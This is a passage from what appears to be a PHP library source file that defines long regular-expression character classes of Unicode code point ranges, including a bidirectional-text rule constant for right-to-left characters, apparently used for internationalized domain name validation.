089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08D3}-\\x{08E1}\\x{08E2}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09F2}-\\x{09F3}\\x{09FB}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AF1}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0BF3}-\\x{0BF8}\\x{0BF9}\\x{0BFA}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C78}-\\x{0C7E}\\x{0C81}\\x{0CBC}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E3F}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F3A}\\x{0F3B}\\x{0F3C}\\x{0F3D}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1390}-\\x{1399}\\x{1400}\\x{1680}\\x{169B}\\x{169C}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DB}\\x{17DD}\\x{17F0}-\\x{17F9}\\x{1800}-\\x{1805}\\x{1806}\\x{1807}-\\x{180A}\\x{180B}-\\x{180D}\\x{180E}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1940}\\x{1944}-\\x{1945}\\x{19DE}-\\x{19FF}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{1FBD}\\x{1FBF}-\\x{1FC1}\\x{1FCD}-\\x{1FCF}\\x{1FDD}-\\x{1FDF}\\x{1FED}-\\x{1FEF}\\x{1FFD}-\\x{1FFE}\\x{2000}-\\x{200A}\\x{200B}-\\x{200D}\\x{200F}\\x{2010}-\\x{2015}\\x{2016}-\\x{2017}\\x{2018}\\x{2019}\\x{201A}\\x{201B}-\\x{201C}\\x{201D}\\x{201E}\\x{201F}\\x{2020}-\\x{2027}\\x{2028}\\x{2029}\\x{202A}\\x{202B}\\x{202C}\\x{202D}\\x{202E}\\x{202F}\\x{2030}-\\x{2034}\\x{2035}-\\x{2038}\\x{2039}\\x{203A}\\x{203B}-\\x{203E}\\x{203F}-\\x{2040}\\x{2041}-\\x{2043}\\x{2044}\\x{2045}\\x{2046}\\x{2047}-\\x{2051}\\x{2052}\\x{2053}\\x{2054}\\x{2055}-\\x{205E}\\x{205F}\\x{2060}-\\x{2064}\\x{2065}\\x{2066}\\x{2067}\\x{2068}\\x{2069}\\x{206A}-\\x{206F}\\x{2070}\\x{2074}-\\x{2079}\\x{207A}-\\x{207B}\\x{207C}\\x{207D}\\x{207E}\\x{2080}-\\x{2089}\\x{208A}-\\x{208B}\\x{208C}\\x{208D}\\x{208E}\\x{20A0}-\\x{20BF}\\x{20C0}-\\x{20CF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2100}-\\x{2101}\\x{2103}-\\x{2106}\\x{2108}-\\x{2109}\\x{2114}\\x{2116}-\\x{2117}\\x{2118}\\x{211E}-\\x{2123}\\x{2125}\\x{2127}\\x{2129}\\x{212E}\\x{213A}-\\x{213B}\\x{2140}-\\x{2144}\\x{214A}\\x{214B}\\x{214C}-\\x{214D}\\x{2150}-\\x{215F}\\x{2189}\\x{218A}-\\x{218B}\\x{2190}-\\x{2194}\\x{2195}-\\x{2199}\\x{219A}-\\x{219B}\\x{219C}-\\x{219F}\\x{21A0}\\x{21A1}-\\x{21A2}\\x{21A3}\\x{21A4}-\\x{21A5}\\x{21A6}\\x{21A7}-\\x{21AD}\\x{21AE}\\x{21AF}-\\x{21CD}\\x{21CE}-\\x{21CF}\\x{21D0}-\\x{21D1}\\x{21D2}\\x{21D3}\\x{21D4}\\x{21D5}-\\x{21F3}\\x{21F4}-\\x{2211}\\x{2212}\\x{2213}\\x{2214}-\\x{22FF}\\x{2300}-\\x{2307}\\x{2308}\\x{2309}\\x{230A}\\x{230B}\\x{230C}-\\x{231F}\\x{2320}-\\x{2321}\\x{2322}-\\x{2328}\\x{2329}\\x{232A}\\x{232B}-\\x{2335}\\x{237B}\\x{237C}\\x{237D}-\\x{2394}\\x{2396}-\\x{239A}\\x{239B}-\\x{23B3}\\x{23B4}-\\x{23DB}\\x{23DC}-\\x{23E1}\\x{23E2}-\\x{2426}\\x{2440}-\\x{244A}\\x{2460}-\\x{2487}\\x{2488}-\\x{249B}\\x{24EA}-\\x{24FF}\\x{2500}-\\x{25B6}\\x{25B7}\\x{25B8}-\\x{25C0}\\x{25C1}\\x{25C2}-\\x{25F7}\\x{25F8}-\\x{25FF}\\x{2600}-\\x{266E}\\x{266F}\\x{2670}-\\x{26AB}\\x{26AD}-\\x{2767}\\x{2768}\\x{2769}\\x{276A}\\x{276B}\\x{276C}\\x{276D}\\x{276E}\\x{276F}\\x{2770}\\x{2771}\\x{2772}\\x{2773}\\x{2774}\\x{2775}\\x{2776}-\\x{2793}\\x{2794}-\\x{27BF}\\x{27C0}-\\x{27C4}\\x{27C5}\\x{27C6}\\x{27C7}-\\x{27E5}\\x{27E6}\\x{27E7}\\x{27E8}\\x{27E9}\\x{27EA}\\x{27EB}\\x{27EC}\\x{27ED}\\x{27EE}\\x{27EF}\\x{27F0}-\\x{27FF}\\x{2900}-\\x{2982}\\x{2983}\\x{2984}\\x{2985}\\x{2986}\\x{2987}\\x{2988}\\x{2989}\\x{298A}\\x{298B}\\x{298C}\\x{298D}\\x{298E}\\x{298F}\\x{2990}\\x{2991}\\x{2992}\\x{2993}\\x{2994}\\x{2995}\\x{2996}\\x{2997}\\x{2998}\\x{2999}-\\x{29D7}\\x{29D8}\\x{29D9}\\x{29DA}\\x{29DB}\\x{29DC}-\\x{29FB}\\x{29FC}\\x{29FD}\\x{29FE}-\\x{2AFF}\\x{2B00}-\\x{2B2F}\\x{2B30}-\\x{2B44}\\x{2B45}-\\x{2B46}\\x{2B47}-\\x{2B4C}\\x{2B4D}-\\x{2B73}\\x{2B76}-\\x{2B95}\\x{2B97}-\\x{2BFF}\\x{2CE5}-\\x{2CEA}\\x{2CEF}-\\x{2CF1}\\x{2CF9}-\\x{2CFC}\\x{2CFD}\\x{2CFE}-\\x{2CFF}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{2E00}-\\x{2E01}\\x{2E02}\\x{2E03}\\x{2E04}\\x{2E05}\\x{2E06}-\\x{2E08}\\x{2E09}\\x{2E0A}\\x{2E0B}\\x{2E0C}\\x{2E0D}\\x{2E0E}-\\x{2E16}\\x{2E17}\\x{2E18}-\\x{2E19}\\x{2E1A}\\x{2E1B}\\x{2E1C}\\x{2E1D}\\x{2E1E}-\\x{2E1F}\\x{2E20}\\x{2E21}\\x{2E22}\\x{2E23}\\x{2E24}\\x{2E25}\\x{2E26}\\x{2E27}\\x{2E28}\\x{2E29}\\x{2E2A}-\\x{2E2E}\\x{2E2F}\\x{2E30}-\\x{2E39}\\x{2E3A}-\\x{2E3B}\\x{2E3C}-\\x{2E3F}\\x{2E40}\\x{2E41}\\x{2E42}\\x{2E43}-\\x{2E4F}\\x{2E50}-\\x{2E51}\\x{2E52}\\x{2E80}-\\x{2E99}\\x{2E9B}-\\x{2EF3}\\x{2F00}-\\x{2FD5}\\x{2FF0}-\\x{2FFB}\\x{3000}\\x{3001}-\\x{3003}\\x{3004}\\x{3008}\\x{3009}\\x{300A}\\x{300B}\\x{300C}\\x{300D}\\x{300E}\\x{300F}\\x{3010}\\x{3011}\\x{3012}-\\x{3013}\\x{3014}\\x{3015}\\x{3016}\\x{3017}\\x{3018}\\x{3019}\\x{301A}\\x{301B}\\x{301C}\\x{301D}\\x{301E}-\\x{301F}\\x{3020}\\x{302A}-\\x{302D}\\x{3030}\\x{3036}-\\x{3037}\\x{303D}\\x{303E}-\\x{303F}\\x{3099}-\\x{309A}\\x{309B}-\\x{309C}\\x{30A0}\\x{30FB}\\x{31C0}-\\x{31E3}\\x{321D}-\\x{321E}\\x{3250}\\x{3251}-\\x{325F}\\x{327C}-\\x{327E}\\x{32B1}-\\x{32BF}\\x{32CC}-\\x{32CF}\\x{3377}-\\x{337A}\\x{33DE}-\\x{33DF}\\x{33FF}\\x{4DC0}-\\x{4DFF}\\x{A490}-\\x{A4C6}\\x{A60D}-\\x{A60F}\\x{A66F}\\x{A670}-\\x{A672}\\x{A673}\\x{A674}-\\x{A67D}\\x{A67E}\\x{A67F}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A700}-\\x{A716}\\x{A717}-\\x{A71F}\\x{A720}-\\x{A721}\\x{A788}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A828}-\\x{A82B}\\x{A82C}\\x{A838}\\x{A839}\\x{A874}-\\x{A877}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{AB6A}-\\x{AB6B}\\x{ABE5}\\x{ABE8}\\x{ABED}\\x{FB1D}\\x{FB1E}\\x{FB1F}-\\x{FB28}\\x{FB29}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD3E}\\x{FD3F}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDD0}-\\x{FDEF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFD}\\x{FDFE}-\\x{FDFF}\\x{FE00}-\\x{FE0F}\\x{FE10}-\\x{FE16}\\x{FE17}\\x{FE18}\\x{FE19}\\x{FE20}-\\x{FE2F}\\x{FE30}\\x{FE31}-\\x{FE32}\\x{FE33}-\\x{FE34}\\x{FE35}\\x{FE36}\\x{FE37}\\x{FE38}\\x{FE39}\\x{FE3A}\\x{FE3B}\\x{FE3C}\\x{FE3D}\\x{FE3E}\\x{FE3F}\\x{FE40}\\x{FE41}\\x{FE42}\\x{FE43}\\x{FE44}\\x{FE45}-\\x{FE46}\\x{FE47}\\x{FE48}\\x{FE49}-\\x{FE4C}\\x{FE4D}-\\x{FE4F}\\x{FE50}\\x{FE51}\\x{FE52}\\x{FE54}\\x{FE55}\\x{FE56}-\\x{FE57}\\x{FE58}\\x{FE59}\\x{FE5A}\\x{FE5B}\\x{FE5C}\\x{FE5D}\\x{FE5E}\\x{FE5F}\\x{FE60}-\\x{FE61}\\x{FE62}\\x{FE63}\\x{FE64}-\\x{FE66}\\x{FE68}\\x{FE69}\\x{FE6A}\\x{FE6B}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{FEFF}\\x{FF01}-\\x{FF02}\\x{FF03}\\x{FF04}\\x{FF05}\\x{FF06}-\\x{FF07}\\x{FF08}\\x{FF09}\\x{FF0A}\\x{FF0B}\\x{FF0C}\\x{FF0D}\\x{FF0E}-\\x{FF0F}\\x{FF10}-\\x{FF19}\\x{FF1A}\\x{FF1B}\\x{FF1C}-\\x{FF1E}\\x{FF1F}-\\x{FF20}\\x{FF3B}\\x{FF3C}\\x{FF3D}\\x{FF3E}\\x{FF3F}\\x{FF40}\\x{FF5B}\\x{FF5C}\\x{FF5D}\\x{FF5E}\\x{FF5F}\\x{FF60}\\x{FF61}\\x{FF62}\\x{FF63}\\x{FF64}-\\x{FF65}\\x{FFE0}-\\x{FFE1}\\x{FFE2}\\x{FFE3}\\x{FFE4}\\x{FFE5}-\\x{FFE6}\\x{FFE8}\\x{FFE9}-\\x{FFEC}\\x{FFED}-\\x{FFEE}\\x{FFF0}-\\x{FFF8}\\x{FFF9}-\\x{FFFB}\\x{FFFC}-\\x{FFFD}\\x{FFFE}-\\x{FFFF}\\x{10101}\\x{10140}-\\x{10174}\\x{10175}-\\x{10178}\\x{10179}-\\x{10189}\\x{1018A}-\\x{1018B}\\x{1018C}\\x{10190}-\\x{1019C}\\x{101A0}\\x{101FD}\\x{102E0}\\x{102E1}-\\x{102FB}\\x{10376}-\\x{1037A}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{1091F}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A01}-\\x{10A03}\\x{10A04}\\x{10A05}-\\x{10A06}\\x{10A07}-\\x{10A0B}\\x{10A0C}-\\x{10A0F}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A38}-\\x{10A3A}\\x{10A3B}-\\x{10A3E}\\x{10A3F}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE5}-\\x{10AE6}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B39}-\\x{10B3F}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D24}-\\x{10D27}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAB}-\\x{10EAC}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F46}-\\x{10F50}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{11001}\\x{11038}-\\x{11046}\\x{11052}-\\x{11065}\\x{1107F}-\\x{11081}\\x{110B3}-\\x{110B6}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112D}-\\x{11134}\\x{11173}\\x{11180}-\\x{11181}\\x{111B6}-\\x{111BE}\\x{111C9}-\\x{111CC}\\x{111CF}\\x{1122F}-\\x{11231}\\x{11234}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{1133B}-\\x{1133C}\\x{11340}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11438}-\\x{1143F}\\x{11442}-\\x{11444}\\x{11446}\\x{1145E}\\x{114B3}-\\x{114B8}\\x{114BA}\\x{114BF}-\\x{114C0}\\x{114C2}-\\x{114C3}\\x{115B2}-\\x{115B5}\\x{115BC}-\\x{115BD}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11633}-\\x{1163A}\\x{1163D}\\x{1163F}-\\x{11640}\\x{11660}-\\x{1166C}\\x{116AB}\\x{116AD}\\x{116B0}-\\x{116B5}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11722}-\\x{11725}\\x{11727}-\\x{1172B}\\x{1182F}-\\x{11837}\\x{11839}-\\x{1183A}\\x{1193B}-\\x{1193C}\\x{1193E}\\x{11943}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119E0}\\x{11A01}-\\x{11A06}\\x{11A09}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A98}-\\x{11A99}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C92}-\\x{11CA7}\\x{11CAA}-\\x{11CB0}\\x{11CB2}-\\x{11CB3}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D90}-\\x{11D91}\\x{11D95}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{11FD5}-\\x{11FDC}\\x{11FDD}-\\x{11FE0}\\x{11FE1}-\\x{11FF1}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F8F}-\\x{16F92}\\x{16FE2}\\x{16FE4}\\x{1BC9D}-\\x{1BC9E}\\x{1BCA0}-\\x{1BCA3}\\x{1D167}-\\x{1D169}\\x{1D173}-\\x{1D17A}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D200}-\\x{1D241}\\x{1D242}-\\x{1D244}\\x{1D245}\\x{1D300}-\\x{1D356}\\x{1D6DB}\\x{1D715}\\x{1D74F}\\x{1D789}\\x{1D7C3}\\x{1D7CE}-\\x{1D7FF}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E2FF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D0}-\\x{1E8D6}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E944}-\\x{1E94A}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF0}-\\x{1EEF1}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}\\x{1F000}-\\x{1F02B}\\x{1F030}-\\x{1F093}\\x{1F0A0}-\\x{1F0AE}\\x{1F0B1}-\\x{1F0BF}\\x{1F0C1}-\\x{1F0CF}\\x{1F0D1}-\\x{1F0F5}\\x{1F100}-\\x{1F10A}\\x{1F10B}-\\x{1F10C}\\x{1F10D}-\\x{1F10F}\\x{1F12F}\\x{1F16A}-\\x{1F16F}\\x{1F1AD}\\x{1F260}-\\x{1F265}\\x{1F300}-\\x{1F3FA}\\x{1F3FB}-\\x{1F3FF}\\x{1F400}-\\x{1F6D7}\\x{1F6E0}-\\x{1F6EC}\\x{1F6F0}-\\x{1F6FC}\\x{1F700}-\\x{1F773}\\x{1F780}-\\x{1F7D8}\\x{1F7E0}-\\x{1F7EB}\\x{1F800}-\\x{1F80B}\\x{1F810}-\\x{1F847}\\x{1F850}-\\x{1F859}\\x{1F860}-\\x{1F887}\\x{1F890}-\\x{1F8AD}\\x{1F8B0}-\\x{1F8B1}\\x{1F900}-\\x{1F978}\\x{1F97A}-\\x{1F9CB}\\x{1F9CD}-\\x{1FA53}\\x{1FA60}-\\x{1FA6D}\\x{1FA70}-\\x{1FA74}\\x{1FA78}-\\x{1FA7A}\\x{1FA80}-\\x{1FA86}\\x{1FA90}-\\x{1FAA8}\\x{1FAB0}-\\x{1FAB6}\\x{1FAC0}-\\x{1FAC2}\\x{1FAD0}-\\x{1FAD6}\\x{1FB00}-\\x{1FB92}\\x{1FB94}-\\x{1FBCA}\\x{1FBF0}-\\x{1FBF9}\\x{1FFFE}-\\x{1FFFF}\\x{2FFFE}-\\x{2FFFF}\\x{3FFFE}-\\x{3FFFF}\\x{4FFFE}-\\x{4FFFF}\\x{5FFFE}-\\x{5FFFF}\\x{6FFFE}-\\x{6FFFF}\\x{7FFFE}-\\x{7FFFF}\\x{8FFFE}-\\x{8FFFF}\\x{9FFFE}-\\x{9FFFF}\\x{AFFFE}-\\x{AFFFF}\\x{BFFFE}-\\x{BFFFF}\\x{CFFFE}-\\x{CFFFF}\\x{DFFFE}-\\x{E0000}\\x{E0001}\\x{E0002}-\\x{E001F}\\x{E0020}-\\x{E007F}\\x{E0080}-\\x{E00FF}\\x{E0100}-\\x{E01EF}\\x{E01F0}-\\x{E0FFF}\\x{EFFFE}-\\x{EFFFF}\\x{FFFFE}-\\x{FFFFF}\\x{10FFFE}-\\x{10FFFF}]/u'; const BIDI_STEP_1_RTL = '/^[\\x{0590}\\x{05BE}\\x{05C0}\\x{05C3}\\x{05C6}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0608}\\x{060B}\\x{060D}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{066D}\\x{066E}-\\x{066F}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06E5}-\\x{06E6}\\x{06EE}-\\x{06EF}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0712}-\\x{072F}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}